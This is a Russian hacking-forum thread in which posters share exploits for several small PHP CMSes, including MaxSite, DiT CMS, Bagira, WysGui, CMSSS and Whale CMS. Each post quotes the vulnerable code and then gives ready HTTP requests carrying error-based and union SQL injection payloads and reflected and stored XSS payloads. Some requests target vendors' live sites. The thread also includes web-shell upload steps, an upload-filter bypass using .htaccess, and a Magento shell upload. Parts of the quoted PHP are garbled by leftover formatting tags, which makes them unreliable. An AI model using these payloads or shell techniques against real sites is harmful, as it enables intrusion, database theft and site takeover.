ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

11.04.2014, 17:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
CMS MaxSite
Version 0.862 - последняя версия!
Официальный сайт http://www.max-3000.com
passive XSS (reflected) в заголовке Referer
Уязвимости на странице с формой регистрации и странице авторизации.
Вектор проведения атаки идентичен, поэтому рассмотрю только страницу авторизации.
127.0.0.1/MaxSite/application/maxsite/templates/default/components/_login/_login.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#DD0000"]['site_url'] . 'login"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin"[/COLOR][COLOR="#007700"]>
[/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#DD0000"]['site_url'] . mso_current_url() . '"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin_redirect"[/COLOR][COLOR="#007700"]>
[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#DD0000"]['session']['session_id'] . '"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin_session_id"[/COLOR][COLOR="#007700"]>[/COLOR][/COLOR]
Exploit:
Сообщение от None
GET /loginform/ HTTP/1.1
Host: max-3000.com
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer
:
http://www.google.com/search?hl=en&q=">alert(1)
Cookie: ci_session=
Connection: close
|
|
|
|

29.04.2014, 09:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
DiT CMS
Версия 2.1.2 (последняя!)
Официальный сайт http://dit-cms.ru
SQL Injection
Уязвимый сценарий: search.php
Уязвимый параметр: dit_search_string_content
Вектор: error-based
Уязвимый код:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dit_search_string_content"[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dit_search_string_content"[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_part WHERE header_"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]lang_system[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIKE '%[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]%' OR desc_"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]lang_system[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIKE '%[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]%' "[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]= array();[/COLOR][/COLOR]
Exploit:
Сообщение от None
POST / HTTP/1.1
Host: dit-cms.ru
...
dit_search_string_content=
'and(extractvalue(1,concat(0x3a,version())))and'
&dit_button_search.x=0&dit_button_search.y=0
passive XSS (reflected) в том же параметре
Exploit:
Сообщение от None
POST / HTTP/1.1
Host: dit-cms.ru
...
dit_search_string_content=
alert('Antichat')
&dit_button_search.x=0&dit_button_search.y=0
|
|
|
|

12.05.2014, 16:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
ECShop V2.7.3
Официальный сайт http://ecshop.com (разработана в Поднебесной)
Исследовал на демо-версии.
passive XSS (reflected) в Referer
Отправляем пакет:
Сообщение от None
GET /user.php HTTP/1.1
Host: ecshop-273-1106.chinascript.ru
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
">alert('Antichat')
Connection: keep-alive
|
|
|
|

16.05.2014, 16:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
CMS Bagira
Версия 1.1.7b (последняя)
Официальный сайт http://bagira-cms.ru/
SQL Injection
Уязвимый сценарий: ormPage.php
Уязвимый параметр: pseudo_url
Зависимости: mq=off
Вектор: error-based
Уязвимый код:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$pseudo_url[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getParentId[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]= (empty([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'p_obj_id <> "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" and '[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"].= (empty([/COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]'r_parent_id is NULL'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'r_parent_id = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'"'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT count(p_obj_id) FROM >, >, >
WHERE pseudo_url = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pseudo_url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" and
lang_id = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]languages[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]curId[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]'" and
domain_id = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]domains[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]curId[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]'" and
r_children_id = p_obj_id and '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' and
o_id = p_obj_id and
o_to_trash = 0;'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]q[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Exploit:
Сообщение от None
GET /BagiraCMS/article
"*(UPDATEXML(1,concat(0x3a,(SELECT version())),4))*"
HTTP/1.1
Host: 127.0.0.1
...
passive XSS(reflected) в строке поиска:
Exploit:
Сообщение от None
POST /BagiraCMS/search HTTP/1.1
Host: 127.0.0.1
...
words=
">alert(1)
|
|
|
|

23.05.2014, 12:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
CMS ModX Revolution 2.2.14-pl
ничего критичного, passive XSS (reflected) на modx.ru
PoC:
Сообщение от None
modx.ru/katalog-sajtov-na-modx/top/?site_version=1&get=top&root=5
";alert('Antichat')//
&site_year=2014&site_sphere=99&filter=
|
|
|
|

30.05.2014, 17:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
CMS WysGui 2.3
Официальный сайт http://wysgui.com
SQL Injection
Уязвимый сценарий: pageData.php
Зависимости: mq=off
Вектор: error-based
Уязвимый код:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]connect[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$select[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT * FROM pagedata WHERE pageURL = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" LIMIT 1'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$select[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
...[/COLOR][/COLOR]
Exploit:
Сообщение от None
GET /WysGui/index.php/
"*(SELECT 1 from information_schema.tables group by concat((SELECT version()),floor(rand(0)*2)) having min(0))*"
HTTP/1.1
Host: 127.0.0.1
...
|
|
|
|

09.06.2014, 18:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
cms CMSSS 1.8 (с названием не заморачивались )
Официальный сайт http://cmsss.all4all.cz
Демо-версия http://cms.all4all.cz
SQL Injection
Уязвимый сценарий: modules/pol/index.php
Зависимости: mq=off
Вектор: union-query
Уязвимый код:
[PHP]
PHP:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$topic<font color="#000000"><font color="#007700">...
</font><font color="#0000BB">$result</font><font color="#007700">=</font><font color="#0000BB">$db</font><font color="#007700">-></font><font color="#0000BB">query</font><font color="#007700">(</font><font color="#DD0000">"SELECT * FROM cmsss_poll_polls"</font><font color="#007700">);
while(</font><font color="#0000BB">$row</font><font color="#007700">=</font><font color="#0000BB">$db</font><font color="#007700">-></font><font color="#0000BB">fetch_array</font><font color="#007700">(</font><font color="#0000BB">$result</font><font color="#007700">)) {
</font><font color="#0000BB">$row_votes</font><font color="#007700">=</font><font color="#0000BB">$db</font><font color="#007700">-></font><font color="#0000BB">fetch_row</font><font color="#007700">(</font><font color="#DD0000">"SELECT * FROM cmsss_poll_votes WHERE poll_id = '"</font><font color="#007700">.</font><font color="#0000BB">$row</font><font color="#007700">[</font><font color="#DD0000">'id'</font><font color="#007700">] .</font><font color="#DD0000">"'"</font><font color="#007700">);
for(</font><font color="#0000BB">$x</font><font color="#007700">=</font><font color="#0000BB">0</font><font color="#007700">;</font><font color="#0000BB">$x</font><font color="#007700">alert(1)</font>, который с радостью записывается в БД:
</font>[COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'topic'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$detail[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'detail'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$kontrola[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'kontrola'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$datetime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"d.m.y H:i:s"[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]//create date time
[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$kontrola[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]"ano"[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO[/COLOR][COLOR="#0000BB"]$tbl_name[/COLOR][COLOR="#DD0000"](topic, detail, name, email, datetime)VALUES('[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$detail[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$datetime[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Соответственно, пользователь, решившый посмотреть топик, получит себе, как минимум alert.
Вы правильно заметили, что тут еще можно провести sql injection, но 2-х инъекций, описанных выше, пока достаточно.
reflected XSS
В данном движке огромное количество reflected XSS(пассивок), искать долго не нужно, например тот же параметр id из 2-ой описанной sql-инъекции.
PHP код:
PHP: [COLOR="#000000"][/COLOR]">
[/COLOR] PoC:
Сообщение от None
http://site.com/modules/forum/view_topic.php?id=
">alert(1)
Ну и Shell Upload
Зависимости: права администратора
1.Administration module==> Downloads==> File Create ==> Профит
Создаем файл с shell.php, вписываем мини-шелл, обращаемся, соответственно: site.com/modules/download/soubor/shell.php?=phpinfo();
2. Напрямую грузим файл через форму Upload.
Мега-функция проверяет наше расширение:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]is_script[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]ereg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'\.php$|\.php3$|\.php4$|\.php5$'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Обход стандартный: грузим .htaccess с нужным AddType или AddHandler, ну, а потом наш файл, например shell.phtml
|
|
|
|

18.11.2014, 23:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
Заливка шелла в magento:
1. через site.com/downloader устанавливаем модуль File System ( http://www.magentocommerce.com/magento-connect/file-system.html )
2. заливаем шелл изменяя ненужный файл
|
|
|
|

23.03.2015, 17:45
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
CMS: Whale CMS 1.0
Сайт: https://www.whale-cms.de
Админ панель: /backend/
Логин/пароль администратора: SELECT name, passwort from [PREFIX]_users;
SQL Injection и Reflected XSS:
Зависимости: MQ = OFF
/sys/template/include/suchen.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$newssuche[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'newssuche'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#DD0000"]"Du hast nach dem Beitragtitel: \"[/COLOR][COLOR="#0000BB"]$newssuche[/COLOR][COLOR="#DD0000"]\" gesucht. Dadurch wurden folgende Einträge gefunden:
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$newssuche_abfrage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"news WHERE titel LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newssuche[/COLOR][COLOR="#007700"]%.[/COLOR][COLOR="#DD0000"]"%' ORDER BY id DESC LIMIT 5"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$newssuche_ergebnis[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$newssuche_abfrage[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
...[/COLOR][/COLOR]
Эксплоит:
Код:
Code:
POST /?page=Home&action=suchen HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 85
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: localhost
User-Agent: '
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/?page=Home
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=nk29sp2qp46mudr0594bksmb14
newssuche=' union select 1,2,3,4,version(),6,7,8,9,10,11--
Stored XSS и Error-Based SQL Injection:
/sys/template/include/newscontent.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"neueskommentarposten"[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$newskommitext[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'kommentartext'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$newskommiautor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'kommentarautor'[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$qu8[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"newskommentar (text, autor, datum, newsID) VALUES ('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskommitext[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskommiautor[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskommidatum[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskomminewsID[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$qu8[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])
{
...
}
else
{
echo[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]();
}[/COLOR][/COLOR]
Эксплоит:
Код:
Code:
POST /?page=News&id=35&action=neueskommentarposten HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 65
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: localhost
User-Agent: '
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/?page=News&id=35
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=nk29sp2qp46mudr0594bksmb14
kommentarautor=">alert(/XSS/)&kommentartext=test
|
|
|

08.12.2017, 18:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 216062
Репутация:
231
|
|
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|